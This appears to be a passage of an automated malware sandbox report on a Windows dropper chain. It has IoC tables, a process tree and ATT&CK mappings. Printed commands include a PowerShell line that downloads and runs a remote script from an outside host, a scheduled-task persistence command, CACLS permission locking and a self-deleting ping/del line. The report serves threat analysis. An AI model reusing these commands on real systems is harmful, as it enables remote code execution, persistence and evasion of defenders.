Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sqlcmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	sqlcmd.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

1732 PING.EXE
1988 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

932 powershell.exe
936 powershell.exe

pid	process
1732	PING.EXE
1988	PING.EXE

pid	process
932	powershell.exe
936	powershell.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

tz0476.exev9844pN.exew12Ai07.exexoFTq64.exepowershell.exeworld.exeYJROPMCQjRX9.exepowershell.exemyp.exemyp.exeserv.exe

pid	process
1332	tz0476.exe
1332	tz0476.exe
1752	v9844pN.exe
1752	v9844pN.exe
1536	w12Ai07.exe
1536	w12Ai07.exe
1332	xoFTq64.exe
1332	xoFTq64.exe
932	powershell.exe
936	world.exe
988	YJROPMCQjRX9.exe
988	YJROPMCQjRX9.exe
988	YJROPMCQjRX9.exe
988	YJROPMCQjRX9.exe
988	YJROPMCQjRX9.exe
936	world.exe
936	powershell.exe
1940	myp.exe
872	myp.exe
872	myp.exe
1940	myp.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe
1104	serv.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

tz0476.exev9844pN.exew12Ai07.exexoFTq64.exepowershell.exeworld.exepowershell.exemyp.exemyp.exeserv.exe

description	pid	process
Token: SeDebugPrivilege	1332	tz0476.exe
Token: SeDebugPrivilege	1752	v9844pN.exe
Token: SeDebugPrivilege	1536	w12Ai07.exe
Token: SeDebugPrivilege	1332	xoFTq64.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	936	world.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	1940	myp.exe
Token: SeDebugPrivilege	872	myp.exe
Token: SeShutdownPrivilege	1104	serv.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Downloader.exeDownloader.exe

pid process

1472 Downloader.exe
564 Downloader.exe

pid	process
1472	Downloader.exe
564	Downloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

710568b21a2c7f5c7bd86c62cdb43683.exezap0575.exezap1162.exezap9947.exey05Uh10.exelegenda.exe

description	pid	process	target process
PID 1928 wrote to memory of 1920	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	zap0575.exe
PID 1928 wrote to memory of 1920	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	zap0575.exe
PID 1928 wrote to memory of 1920	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	zap0575.exe
PID 1928 wrote to memory of 1920	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	zap0575.exe
PID 1928 wrote to memory of 1920	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	zap0575.exe
PID 1928 wrote to memory of 1920	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	zap0575.exe
PID 1928 wrote to memory of 1920	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	zap0575.exe
PID 1920 wrote to memory of 584	1920	zap0575.exe	zap1162.exe
PID 1920 wrote to memory of 584	1920	zap0575.exe	zap1162.exe
PID 1920 wrote to memory of 584	1920	zap0575.exe	zap1162.exe
PID 1920 wrote to memory of 584	1920	zap0575.exe	zap1162.exe
PID 1920 wrote to memory of 584	1920	zap0575.exe	zap1162.exe
PID 1920 wrote to memory of 584	1920	zap0575.exe	zap1162.exe
PID 1920 wrote to memory of 584	1920	zap0575.exe	zap1162.exe
PID 584 wrote to memory of 580	584	zap1162.exe	zap9947.exe
PID 584 wrote to memory of 580	584	zap1162.exe	zap9947.exe
PID 584 wrote to memory of 580	584	zap1162.exe	zap9947.exe
PID 584 wrote to memory of 580	584	zap1162.exe	zap9947.exe
PID 584 wrote to memory of 580	584	zap1162.exe	zap9947.exe
PID 584 wrote to memory of 580	584	zap1162.exe	zap9947.exe
PID 584 wrote to memory of 580	584	zap1162.exe	zap9947.exe
PID 580 wrote to memory of 1332	580	zap9947.exe	tz0476.exe
PID 580 wrote to memory of 1332	580	zap9947.exe	tz0476.exe
PID 580 wrote to memory of 1332	580	zap9947.exe	tz0476.exe
PID 580 wrote to memory of 1332	580	zap9947.exe	tz0476.exe
PID 580 wrote to memory of 1332	580	zap9947.exe	tz0476.exe
PID 580 wrote to memory of 1332	580	zap9947.exe	tz0476.exe
PID 580 wrote to memory of 1332	580	zap9947.exe	tz0476.exe
PID 580 wrote to memory of 1752	580	zap9947.exe	v9844pN.exe
PID 580 wrote to memory of 1752	580	zap9947.exe	v9844pN.exe
PID 580 wrote to memory of 1752	580	zap9947.exe	v9844pN.exe
PID 580 wrote to memory of 1752	580	zap9947.exe	v9844pN.exe
PID 580 wrote to memory of 1752	580	zap9947.exe	v9844pN.exe
PID 580 wrote to memory of 1752	580	zap9947.exe	v9844pN.exe
PID 580 wrote to memory of 1752	580	zap9947.exe	v9844pN.exe
PID 584 wrote to memory of 1536	584	zap1162.exe	w12Ai07.exe
PID 584 wrote to memory of 1536	584	zap1162.exe	w12Ai07.exe
PID 584 wrote to memory of 1536	584	zap1162.exe	w12Ai07.exe
PID 584 wrote to memory of 1536	584	zap1162.exe	w12Ai07.exe
PID 584 wrote to memory of 1536	584	zap1162.exe	w12Ai07.exe
PID 584 wrote to memory of 1536	584	zap1162.exe	w12Ai07.exe
PID 584 wrote to memory of 1536	584	zap1162.exe	w12Ai07.exe
PID 1920 wrote to memory of 1332	1920	zap0575.exe	xoFTq64.exe
PID 1920 wrote to memory of 1332	1920	zap0575.exe	xoFTq64.exe
PID 1920 wrote to memory of 1332	1920	zap0575.exe	xoFTq64.exe
PID 1920 wrote to memory of 1332	1920	zap0575.exe	xoFTq64.exe
PID 1920 wrote to memory of 1332	1920	zap0575.exe	xoFTq64.exe
PID 1920 wrote to memory of 1332	1920	zap0575.exe	xoFTq64.exe
PID 1920 wrote to memory of 1332	1920	zap0575.exe	xoFTq64.exe
PID 1928 wrote to memory of 2012	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	y05Uh10.exe
PID 1928 wrote to memory of 2012	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	y05Uh10.exe
PID 1928 wrote to memory of 2012	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	y05Uh10.exe
PID 1928 wrote to memory of 2012	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	y05Uh10.exe
PID 1928 wrote to memory of 2012	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	y05Uh10.exe
PID 1928 wrote to memory of 2012	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	y05Uh10.exe
PID 1928 wrote to memory of 2012	1928	710568b21a2c7f5c7bd86c62cdb43683.exe	y05Uh10.exe
PID 2012 wrote to memory of 1260	2012	y05Uh10.exe	legenda.exe
PID 2012 wrote to memory of 1260	2012	y05Uh10.exe	legenda.exe
PID 2012 wrote to memory of 1260	2012	y05Uh10.exe	legenda.exe
PID 2012 wrote to memory of 1260	2012	y05Uh10.exe	legenda.exe
PID 2012 wrote to memory of 1260	2012	y05Uh10.exe	legenda.exe
PID 2012 wrote to memory of 1260	2012	y05Uh10.exe	legenda.exe
PID 2012 wrote to memory of 1260	2012	y05Uh10.exe	legenda.exe
PID 1260 wrote to memory of 1636	1260	legenda.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\710568b21a2c7f5c7bd86c62cdb43683.exe
"C:\Users\Admin\AppData\Local\Temp\710568b21a2c7f5c7bd86c62cdb43683.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1928

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap0575.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap0575.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1920

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap1162.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap1162.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:584

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9947.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9947.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:580

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz0476.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz0476.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v9844pN.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v9844pN.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w12Ai07.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w12Ai07.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xoFTq64.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xoFTq64.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y05Uh10.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y05Uh10.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2012

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1260

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
4⤵
- Creates scheduled task(s)
PID:1636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
4⤵
PID:1280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:1340

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
5⤵
PID:1388

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
5⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:1980

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
5⤵
PID:1624

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
5⤵
PID:1848

C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:580

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:1636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000087001\sqlcmd.exe" >> NUL
5⤵
PID:984

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1732

C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
"C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe
"C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe"
4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1340

C:\Users\Admin\AppData\Roaming\1000120000\YJROPMCQjRX9.exe
"C:\Users\Admin\AppData\Roaming\1000120000\YJROPMCQjRX9.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:988

C:\Users\Admin\AppData\Local\Temp\1000123001\Downloader.exe
"C:\Users\Admin\AppData\Local\Temp\1000123001\Downloader.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1472

C:\Users\Admin\AppData\Local\Temp\1000123001\myp.exe
"C:\Users\Admin\AppData\Local\Temp\1000123001\myp.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Users\Admin\AppData\Local\Temp\1000123001\clip.exe
"C:\Users\Admin\AppData\Local\Temp\1000123001\clip.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1056

C:\Users\Admin\AppData\Local\Temp\1000124001\Downloader.exe
"C:\Users\Admin\AppData\Local\Temp\1000124001\Downloader.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:564

C:\Users\Admin\AppData\Local\Temp\1000124001\myp.exe
"C:\Users\Admin\AppData\Local\Temp\1000124001\myp.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Users\Admin\AppData\Local\Temp\1000124001\clip.exe
"C:\Users\Admin\AppData\Local\Temp\1000124001\clip.exe" 0
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1184

C:\Users\Admin\AppData\Local\Temp\1000125001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000125001\sqlcmd.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1000

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:1064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000125001\sqlcmd.exe" >> NUL
5⤵
PID:1992

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1988

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
4⤵
- Loads dropped DLL
PID:884

C:\Windows\system32\taskeng.exe
taskeng.exe {AFB7E3F9-1472-4C8E-89AC-9774042F1EC3} S-1-5-21-1283023626-844874658-3193756055-1000:THEQWNRW\Admin:Interactive:[1]
1⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
2⤵
- Executes dropped EXE
PID:788

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

System Information Discovery